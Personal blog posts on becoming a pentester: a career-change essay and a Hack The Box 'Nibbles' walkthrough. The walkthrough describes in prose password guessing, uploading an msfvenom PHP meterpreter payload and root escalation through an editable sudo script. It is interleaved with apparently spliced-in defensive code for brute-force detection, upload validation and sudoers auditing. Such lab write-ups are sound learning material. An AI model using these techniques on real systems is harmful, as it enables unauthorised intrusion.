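The cradle on its own is only medium severity because administrators do use these cmdlets; the high-severity alert fires only when the downloaded file is executed on the same host within the window, which is exactly the sequence the walkthrough performs. On a real estate the same correlation would be fed from Sysmon event ID 1 or 4688 with command-line logging enabled.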

As you can see, I got NT AUTHORITY\SYSTEM!

After that, I clearly got the root flag!

Conclusion

I am so proud that I was able to get the root flag using my previous notes. I also finished this box in record time. Another thing I did was remember how to upgrade my netcat shell, which made getting root easy. Just a final message to you all: keep going! One day you will realize you know more than you think.

My Career Change Strategy to Become a Pentester

I decided early this year that I wanted to become a pentester. Although I had an inkling in 2019 that this may be a field that I want to get into after determining that my current career is not my dream career, I really began to make moves in the field in January of 2020. Now that it is the end of the year, I wanted to reflect on how my journey began, how it developed over the course of this year, and what I am now doing in order to satisfy my dream.

Let me begin with a bit of my history.

I finally graduated and began my career in my chosen field in 2018. I have a degree in Hispanic Linguistics and, after moving to the U.S. with my then fiancé because he got a job, I was unable to immediately find a job teaching at a community college. During my Master’s degree, I wanted to do exactly that, but the opportunities where I live are extremely limited. So I went back to school to do a Master’s in Communication since I thought it would be easier to get a job. After I completed this degree in December 2017, I began my job search and found teaching jobs in March of 2018. At the beginning, everything was great. However, over time I realized that I was not in love with the field. The career is okay (not enjoyable), but it is limited and my growth opportunities do not sound appealing to me. I realized I was unmotivated, uninspired, and struggling to get work. I was struggling for a career and job that I do not love and that I began to dread when I woke up in the morning. So, in 2019, I realized that I wanted to make a change. However, not only did I not know what I wanted to do, but I am also very limited in the work I can do here in the U.S.

After deciding that my current career is not for me, I decided to take courses in anything I found interesting through Lynda or Udemy. This included programming and reiki, and I even began a course in cybersecurity. I was mostly dabbling in anything whenever I had time, but cybersecurity and programming were interesting to me. The pay and the lifestyle also began calling me. However, I really did not make any moves in the field until January 3, 2020, during the holiday season. I was bored, and on Twitter, and I read about the #100DaysofCoding challenge. I decided that I would try it because I was wasting time in a job I disliked. I decided that if I wanted the change to happen, I had to actually DO something.

And I completed the challenge. I did HTML, CSS, and JavaScript courses. Although I did not do something daily because of my work schedule, I was pretty consistent and completed the 100 days probably at 120 days into the year. However, during these 120 days, a course showed up on my YouTube feed, which was “Full Ethical Hacking Course” by The Cyber Mentor. It is a 15 hour course, and it piqued my interest after beginning (but not completing) a cybersec course I had purchased on Udemy the previous year. Although the course is only 15 hours, it took me a LONG time to complete it because I have difficulty sitting and doing a course. I prefer doing. Although the course has opportunities to follow along, I mostly just took notes because I did not have a membership to Hack the Box or Try Hack Me yet. I did join The Cyber Mentor’s Discord server and started learning a bit more about pentesting. Although it did take me a long time to finish the course, I actually did. And I wanted to keep going.

At this point, I read some advice about completing Try Hack Me boxes and doing paths. I thought it would all be great because I had some great notes from the 15 hour course. Little did I expect that pentesting is not easy. But it was addictive. I would spend hours working on a box, trying to learn and also trying to figure out how to solve everything. I have taken diligent notes on the different boxes as well as different methods. I finished the Basic path and began working on the Offensive path. But work began getting in the way and I had little time to spend on these boxes. Sometimes they would get completed, but other times it would take me weeks to find the time to complete a box, especially with the changes at work due to the Covid pandemic.

I started listening to career change podcasts (like “Happen to Your Career”). From one of their podcast episodes, I realized that I needed to try immersion, which is to find points in my day where I can easily add moments of work/study. I changed my schedule to easily add these moments: I listen to a podcast during my dog’s walk, I network via Twitter while drinking my morning coffee, I read a pentesting book/article during my afternoon coffee, and at 5pm I stop working and immediately start either hacking a box, writing an article, or watching a course video (currently taking The Cyber Mentor’s full Practical Ethical Hacking course, which is 25 hours long) until 6pm. If I have more time at night, I will do more than the 40 minutes. If not, I have already structured some time in my day to continue learning.

In 2020, I have therefore decided upon my new career, learned some programming skills, hacked quite a few boxes, done learning paths on Try Hack Me, read books, met people in the field, learned from people on the Discord and watched courses. Most importantly, I found something that I love to do. I want to improve upon my immersion plan in 2021, finish The Cyber Mentor’s courses, and practice the boxes recommended prior to the OSCP. Hopefully I can take the OSCP next year or at least change jobs into a more related field. I appreciate all of the help my mentors and experts have given me this year, and I hope I meet more of you in 2021!

Hack The Box – Nibbles

Introduction

I completed this box as part of the midcourse capstone project for the “Practical Ethical Hacking” course by The Cyber Mentor on my journey to the OSCP. This box was quite difficult for me, although not in terms of basic knowledge. My difficulties lay in little details, which I will explain. This walkthrough will include my successes and failures, along with the materials I used in order to overcome them.

Walkthroughs Used

https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-nibbles/

https://www.doyler.net/security-not-included/hack-the-box-nibbles

Enumeration

Using my basic nmap scan, I was able to find two ports open: 22 and 80. I did try to SSH into the machine using anonymous credentials, which did not work. So I decided to begin with port 80.

I went into the browser and typed <IP>:80, which led me to a basic “Hello World” page. At this point, I checked the code of the page and saw that there is a directory called /nibbleblog. At this point, I wanted to use dirbuster to find any hidden directories.

I really like using dirbuster because I can look for files with different extensions. This is the first point I ran into difficulty. If you have experience, you will immediately see my error.

With the above settings, I could not find many directories and I was stuck. Looking at the first walkthrough I have linked to at the top of the page, I realized that there was an /admin.php file that I could not see. I realized I must have made an error somewhere.

I figured out that it was because I did not have the “Dir start with” to /nibbleblog, so dirbuster was not running on the correct directory. Once I determined this, I was able to find the correct file.

This admin.php led to a login form, which I knew I was going to try to brute force. I like using OWASP ZAP to do this because I can easily fuzz the password.

However, using the dirbuster medium wordlist, no password was found. This is one thing I do not like about Hack The Box. Sometimes the password is not on a password list and the password is related to the box title. I was able to guess the password for admin this way.
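Fuzzing a login form the way described above shows up on the server side as a burst of POST requests to one path from one client address, which is easy to spot in an access log. As an added example, not code from the post or from Nibbleblog, the following Python script parses constructed Apache combined-format log lines and alerts when a single client sends a threshold number of POSTs to the login path within a sliding window. The client addresses and timestamps are made up; the /nibbleblog/admin.php path is the one named in the walkthrough.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache combined-log style line: client, identd, user, [timestamp], "METHOD path proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def build_sample_log():
    """Constructed access-log lines (not from the box): one client posts to the
    login form 12 times in 12 seconds, another retries three times over several minutes."""
    base = datetime(2020, 12, 1, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 1532 "-" "Mozilla/5.0"'

    lines = [line("10.10.14.9", 0, "GET", "/nibbleblog/", 200)]
    lines += [line("10.10.14.5", 5 + i, "POST", "/nibbleblog/admin.php", 200) for i in range(12)]
    lines += [line("10.10.14.9", 30 + 90 * i, "POST", "/nibbleblog/admin.php", 200) for i in range(3)]
    return lines


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop the query string
        "status": int(m["status"]),
    }


def detect_login_bruteforce(lines, login_path="/nibbleblog/admin.php",
                            threshold=10, window_seconds=60):
    """Alert once per client that sends `threshold` POSTs to the login path
    within any `window_seconds` span. Status codes are deliberately ignored:
    many PHP login forms answer a failed login with 200 and an error message."""
    recent = defaultdict(deque)   # ip -> timestamps of that client's recent login POSTs
    alerted = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        window = recent[rec["ip"]]
        window.append(rec["ts"])
        # Slide the window: drop timestamps older than window_seconds before this request.
        while (rec["ts"] - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold and rec["ip"] not in alerted:
            alerted.add(rec["ip"])
            alerts.append({"ip": rec["ip"], "count": len(window),
                           "first": window[0], "last": rec["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_login_bruteforce(build_sample_log()):
        print(alert)
```

The same counter, placed in front of the login handler instead of behind the log, is the basis for rate limiting or a temporary lockout; note that a password guessed from the site's own name, as happened here, is a one-request event that no threshold will catch, which is why the real fix is a password that is not derivable from public information.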

Exploitation

Once I got into nibbleblog, I found the version and noticed it ran with PHP. I then looked up exploits for the version on exploit-db. I found this one:

However, this exploit did not work for me. Metasploit could not create a session, even though I used the same settings that I found online and they seemed to be accurate. So, I then explored the nibbleblog site and found some place where I could upload a file. I knew that, from here, I could create a malicious payload through msfvenom for PHP and try to upload it to the site.

Since I used a meterpreter payload, I used a listener via metasploit, which I have done before.

In the browser, I went to the file location and clicked on the file and, as you can see above, I was able to get a meterpreter shell and was able to get the user flag.
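The upload step worked because the application accepted a PHP file and then served it from a web-accessible location where the server executed it. As an added example of the server-side check that closes that path (my own code, not Nibbleblog's), the Python function below whitelists image extensions, rejects path components and double extensions, and requires the file content to match the declared type. The extension list, magic bytes and size limit are my own choices for the demo.

```python
import os
import re
import secrets

# Image types this hypothetical upload handler accepts, keyed by extension,
# with the leading bytes each format must start with (my own choice of list).
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
SCRIPT_TAGS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename, data, max_bytes=5 * 1024 * 1024):
    """Return (accepted, reason). Every rejection names the first failed check."""
    # 1. Filename hygiene: no directories, exactly one extension, conservative characters.
    if filename != os.path.basename(filename.replace("\\", "/")):
        return False, "filename contains path components"
    if filename.count(".") != 1:
        return False, "filename must have exactly one extension"
    stem, ext = filename.rsplit(".", 1)
    ext = ext.lower()
    if not STEM_RE.match(stem):
        return False, "filename contains unsafe characters"
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not allowed"
    # 2. Size bound before looking at content.
    if len(data) > max_bytes:
        return False, "file too large"
    # 3. Content must match the declared type and must not carry script tags
    #    that a misconfigured server might hand to an interpreter.
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    if any(tag in data for tag in SCRIPT_TAGS):
        return False, "embedded script tag"
    return True, "ok"


def stored_name(ext, token=None):
    """Server-chosen name: the client's stem is discarded, only the validated extension survives."""
    token = token or secrets.token_hex(16)
    return f"{token}.{ext}"
```

Validation alone is only half of the fix: the stored file should also live outside the document root (or in a directory the web server is configured never to execute) and be served under the server-chosen name from `stored_name`, so that nothing the client controlled ever reaches an interpreter.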

Privilege Escalation

I also noticed a personal.zip file, though the “unzip” command was not working. Many other commands were also not working, including “su”, “sudo”, “sudo -l”, “unzip”, “wget” (I was trying to get LinEnum onto the machine), “curl”, etc. I even tried the above steps using netcat instead, and that shell was unstable. I used The Cyber Mentor’s Discord channel and searched for a conversation where people had trouble with their meterpreter shell, and found a question by another user who had the same difficulty as I did with this box. Another user suggested typing “shell” to spawn a shell. Although this did work for me, the shell was not very responsive and took time. Mostly I spawned the shell whenever the meterpreter shell could not complete the task. When a command did not work, I would spawn a shell and then it would work. This is why you see in the below photo that I opened up to a fourth channel.

Once I was able to get the above shell, I began my list of Linux privilege escalation commands I usually try. After trying “su root”, I always try “sudo -l” next, and this time it showed the “monitor.sh” file, located in the personal.zip file. I knew that I had to try to unzip the file again, which worked in the new shell.

Doing the above process, I was able to unzip the personal.zip archive and found the monitor.sh file. I had no idea what to do here. I tried the solution in the first walkthrough linked above, which did not work. So, I looked up another walkthrough which suggested the below solution:

As you can see, adding the above code to monitor.sh and running it allowed me to get root. I was then able to get the flag!
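The privilege escalation above works because sudo lets the low-privileged user run a script as root while that same user is allowed to edit the script, so whatever is written into it runs as root. As an added example, not from the post, here is a Python audit that parses sudoers-style lines (a constructed subset of the real syntax: user, host, optional runas, tags, comma-separated commands) and flags entries whose target file or containing directory is writable by a non-root user. The `lowpriv` and `ops` entries, the temporary-directory monitor.sh and its 0777 mode are all constructed for the demo; the real box's sudoers is not on this page.

```python
import os
import re
import shutil
import stat
import tempfile

RUNAS_RE = re.compile(r"\(([^)]*)\)\s*")
TAG_RE = re.compile(r"([A-Z]+):\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Parse the common shape of sudoers user entries:
       who host = (runas) TAG: /path args, /path2 args
    Defaults, alias definitions and comments are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES) or "=" not in line:
            continue
        left, right = line.split("=", 1)
        parts = left.split()
        who, host = parts[0], parts[-1]
        right = right.strip()
        runas = "root"                       # sudo's default when no (runas) is given
        m = RUNAS_RE.match(right)
        if m:
            runas, right = m.group(1), right[m.end():]
        tags = []
        while True:
            m = TAG_RE.match(right)
            if not m:
                break
            tags.append(m.group(1))
            right = right[m.end():]
        for spec in right.split(","):
            spec = spec.strip()
            if spec:
                entries.append({"who": who, "host": host, "runas": runas, "tags": tags,
                                "command": spec.split()[0], "spec": spec})
    return entries


def writable_by_non_root(path):
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_entries(entries):
    """Flag entries that let a user run, as another user, something that user could modify."""
    findings = []
    for e in entries:
        cmd = e["command"]
        issue = None
        if cmd == "ALL":
            issue = None if e["who"] == "root" else "may run any command"
        elif not os.path.isabs(cmd):
            issue = "command is not an absolute path"
        elif not os.path.exists(cmd):
            issue = "target does not exist"
        elif writable_by_non_root(cmd):
            issue = "target file is writable by a non-root user"
        elif writable_by_non_root(os.path.dirname(cmd)):
            issue = "target directory is writable by a non-root user (file can be replaced)"
        if issue:
            findings.append({**e, "issue": issue})
    return findings


def demo():
    """Constructed scenario: a script runnable as root via NOPASSWD that its caller can edit."""
    workdir = tempfile.mkdtemp()
    try:
        script = os.path.join(workdir, "monitor.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\necho monitoring\n")
        os.chmod(script, 0o777)   # deliberately weak permissions for the demo
        sudoers = f"""
Defaults secure_path="/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
# constructed entry modelled on the post: one script runnable as root without a password
lowpriv ALL=(root) NOPASSWD: {script}
ops     ALL=(root) /bin/ls /var/log
"""
        return audit_entries(parse_sudoers(sudoers))
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    for finding in demo():
        print(finding["who"], finding["command"], "->", finding["issue"])
```

The remediation the audit points at is the usual one: anything referenced from sudoers must be owned by root, writable only by root, and live in a root-owned directory; `visudo` checks syntax but does not check the permissions of the targets, so a check like this belongs in configuration management or a periodic host audit.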

Conclusion

In conclusion, I had quite a few hurdles in this box. First, I was unable to find the directory. Second, I was unable to brute force the password. Third, I could not get the meterpreter shell to work. Fourth, I did not know what to do to the .sh file. However, with the use of walkthroughs and perseverance, I was able to overcome these issues to get the flags.